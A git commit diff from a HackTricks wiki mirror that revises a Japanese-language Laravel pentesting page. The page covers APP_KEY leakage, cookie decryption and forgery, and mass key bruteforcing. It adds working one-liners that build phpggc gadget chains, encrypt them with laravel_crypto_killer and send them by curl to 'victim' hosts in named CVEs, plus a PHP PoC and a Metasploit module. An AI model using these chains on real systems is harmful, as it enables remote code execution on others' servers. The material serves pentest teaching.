maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/laravel.md']

Browse Source
This commit is contained in:
Translator 2025-08-04 22:32:18 +00:00
parent e92b4bf006
commit 0c822927e9
1 changed files with 46 additions and 114 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

160
src/network-services-pentesting/pentesting-web/laravel.md
View File

@ -45,64 +45,74 @@ laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
スクリプトはCBCおよびGCMペイロードの両方を透過的にサポートし、HMAC/tagフィールドを再生成します。
スクリプトはCBCおよびGCMペイロードの両方を透過的にサポートし、HMAC/タグフィールドを再生成します。
---
## 実世界の脆弱なパターン
| プロジェクト | 脆弱なシンク | ガジェットチェーン |
|--------------|--------------|-------------------|
|--------------|--------------|--------------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN`クッキーが`Passport::withCookieSerialization()`が有効なとき | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session`クッキー | Laravel/RCE15 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN`クッキーが`Passport::withCookieSerialization()`で有効な場合 | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session`クッキー | Laravel/RCE15 |
エクスプロイトのワークフローは常に次のりです:
1. `APP_KEY`を取得するデフォルトの例、Gitリーク、config/.envリーク、またはブルートフォース
2. **PHPGGC**でガジェットを生成する
3. `laravel_crypto_killer.py encrypt …`
4. 脆弱なパラメータ/クッキーを通じてペイロードを配信 → **RCE**
エクスプロイトのワークフローは常に次のとおりです:
1. 32バイトの`APP_KEY`を取得またはブルートフォースします。
2. **PHPGGC**を使用してガジェットチェーンを構築します(例えば`Laravel/RCE13``Laravel/RCE9`または`Laravel/RCE15`)。
3. 回収した`APP_KEY`と**laravel_crypto_killer.py**を使用してシリアライズされたガジェットを暗号化します。
4. 脆弱な`decrypt()`シンク(ルートパラメータ、クッキー、セッションなど)に暗号文を送信して**RCE**をトリガーします。
以下は、上記の各実世界CVEの完全な攻撃パスを示す簡潔なワンライナーです
```bash
# Invoice Ninja ≤5 /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"
# Snipe-IT ≤6 XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
# Crater cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
```
---
## クッキーのブルートフォースによる大規模APP_KEY発見
## マス APP_KEY 発見によるクッキー総当たり攻撃
新しいLaravelのレスポンスは少なくとも1つの暗号化されたクッキー`XSRF-TOKEN`および通常は`laravel_session`)を設定するため、**公共のインターネットスキャナーShodan、Censysなどは数百万の暗号文を漏洩**し、オフラインで攻撃可能です。
新しい Laravel のレスポンスは少なくとも 1 つの暗号化されたクッキー(`XSRF-TOKEN` と通常は `laravel_session`)を設定するため、**パブリックインターネットスキャナーShodan, Censys, …)は数百万の暗号文を漏洩させ**、オフラインで攻撃可能です。
Synacktivによって発表された研究の主な発見2024-2025
* データセット2024年7月 » 580kトークン、**3.99%のキーが解読**≈23k
* データセット2025年5月 » 625kトークン、**3.56%のキーが解読**
* >1,000サーバーがレガシーCVE-2018-15133に対して依然として脆弱で、トークンが直接シリアライズされたデータを含んでいます。
* 大規模なキー再利用 トップ10のAPP_KEYは商業用LaravelテンプレートUltimatePOS、Invoice Ninja、XPanelなどにハードコーディングされたデフォルトです。
Synacktiv によって発表された研究の主な発見2024-2025
* データセット 2024年7月 » 580 k トークン、**3.99 % のキーが解読**≈23 k
* データセット 2025年5月 » 625 k トークン、**3.56 % のキーが解読**
* >1,000 サーバーがレガシー CVE-2018-15133 に対して依然として脆弱で、トークンが直接シリアライズされたデータを含んでいます。
* 巨大なキーの再利用 トップ10の APP_KEY は商業用 Laravel テンプレートUltimatePOS, Invoice Ninja, XPanel, …)にハードコーディングされたデフォルトです。
プライベートGoツール**nounours**はAES-CBC/GCMのブルートフォーススループットを約15億試行/秒に押し上げ、フルデータセットの解読を2分未満に短縮します。
プライベート Go ツール **nounours** は AES-CBC/GCM の総当たりスループットを約 15 億試行/秒に押し上げ、フルデータセットの解読を 2 分未満に短縮します。
---
## 参考文献
* [Laravel: APP_KEY漏洩分析](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP一般的ガジェットチェーン](https://github.com/ambionics/phpggc)
* [CVE-2018-15133の詳細WithSecure](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
## Laravelのトリック
## Laravel トリック
### デバッグモード
Laravelが**デバッグモード**のとき、**コード**や**機密データ**にアクセスできます。\
例えば`http://127.0.0.1:8000/profiles`:
Laravel が **デバッグモード** の場合、**コード** と **機密データ** にアクセスできます。\
例えば `http://127.0.0.1:8000/profiles`:
![](<../../images/image (1046).png>)
これは通常、他のLaravel RCE CVEを悪用するために必要です。
これは通常、他の Laravel RCE CVE を悪用するために必要です。
### .env
Laravelはクッキーや他の資格情報を暗号化するために使用するAPPを`.env`というファイルに保存しており、次のパストラバーサルを使用してアクセスできます:`/../.env`
Laravel はクッキーや他の資格情報を暗号化するために使用する APP `.env` というファイルに保存しており、次のパストラバーサルを使用してアクセスできます:`/../.env`
Laravelはこの情報をデバッグページにも表示しますLaravelがエラーを見つけたときに表示され、アクティブになります)。
Laravel はエラーを見つけたときにデバッグページ内にもこの情報を表示します(それが有効になっている場合)。
Laravelの秘密のAPP_KEYを使用して、クッキーを復号化し再暗号化できます
Laravel の秘密の APP_KEY を使用して、クッキーを復号化し再暗号化できます:
### クッキーの復号化
```python
@ -170,97 +180,19 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
ここでデシリアライズの脆弱性に関する情報を見つけることができます: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
[https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)を使用してテストおよび悪用できます。\
また、metasploitを使用しても悪用できます: `use unix/http/laravel_token_unserialize_exec`
また、metasploitを使用しても悪用できます: `use unix/http/laravel_token_unserialize_exec`
### CVE-2021-3129
別のデシリアライズ: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
### Laravel SQLInjection
ここでの情報をお読みください: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
### Laravel SQLInjection
ここでの情報をお読みください: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
---
## APP_KEY & 暗号化の内部 (Laravel \u003e=5.6)
Laravelは、内部でHMAC整合性を持つAES-256-CBCまたはGCMを使用しています`Illuminate\\Encryption\\Encrypter`)。
最終的に**クライアントに送信される**生の暗号文は、**JSONオブジェクトのBase64**のようになります:
```json
{
"iv" : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac" : "HMAC_SHA256(iv||value, APP_KEY)",
"tag" : "" // only used for AEAD ciphers (GCM)
}
```
`encrypt($value, $serialize=true)` はデフォルトでプレーンテキストを `serialize()` し、`decrypt($payload, $unserialize=true)` **は自動的に `unserialize()`** された値を復号化します。したがって、**32バイトの秘密 `APP_KEY` を知っている攻撃者は、暗号化されたPHPシリアライズオブジェクトを作成し、マジックメソッド`__wakeup``__destruct`、…を介してRCEを得ることができます**。
最小限のPoCフレームワーク ≥9.x
```php
use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
生成された文字列を任意の脆弱な `decrypt()` シンク(ルートパラメータ、クッキー、セッションなど)に注入します。
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) は、全プロセスを自動化し、便利な **bruteforce** モードを追加します:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
スクリプトはCBCおよびGCMペイロードの両方を透過的にサポートし、HMAC/tagフィールドを再生成します。
---
## 実世界の脆弱なパターン
| プロジェクト | 脆弱なシンク | ガジェットチェーン |
|--------------|--------------|--------------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN`クッキーが`Passport::withCookieSerialization()`を有効にしている場合 | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session`クッキー | Laravel/RCE15 |
エクスプロイトのワークフローは常に次の通りです:
1. `APP_KEY`を取得するデフォルトの例、Gitリーク、config/.envリーク、またはブルートフォース
2. **PHPGGC**でガジェットを生成する
3. `laravel_crypto_killer.py encrypt …`
4. 脆弱なパラメータ/クッキーを通じてペイロードを配信 → **RCE**
---
## クッキーのブルートフォースによる大規模なAPP_KEY発見
新しいLaravelのレスポンスは少なくとも1つの暗号化されたクッキー`XSRF-TOKEN`および通常は`laravel_session`)を設定するため、**公共のインターネットスキャナーShodan、Censysなどは数百万の暗号文を漏洩**し、オフラインで攻撃可能です。
Synacktivによって発表された研究の主な発見2024-2025
* データセット2024年7月 » 580kトークン、**3.99%のキーが解読**≈23k
* データセット2025年5月 » 625kトークン、**3.56%のキーが解読**
* >1,000サーバーがレガシーCVE-2018-15133に対して依然として脆弱で、トークンが直接シリアライズされたデータを含んでいます。
* 巨大なキーの再利用 トップ10のAPP_KEYは商業用LaravelテンプレートUltimatePOS、Invoice Ninja、XPanelなどに付属するハードコーディングされたデフォルトです。
プライベートGoツール**nounours**はAES-CBC/GCMのブルートフォーススループットを約15億試行/秒に押し上げ、フルデータセットの解読を2分未満に短縮します。
---
## 参考文献
* [Laravel: APP_KEY漏洩分析](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel: APP_KEY 漏洩分析 (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : APP_KEY の漏洩分析 (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP一般的ガジェットチェーン](https://github.com/ambionics/phpggc)
* [CVE-2018-15133の詳細WithSecure](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
* [PHPGGC PHP ジェネリックガジェットチェーン](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 の詳細 (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
{{#include ../../banners/hacktricks-training.md}}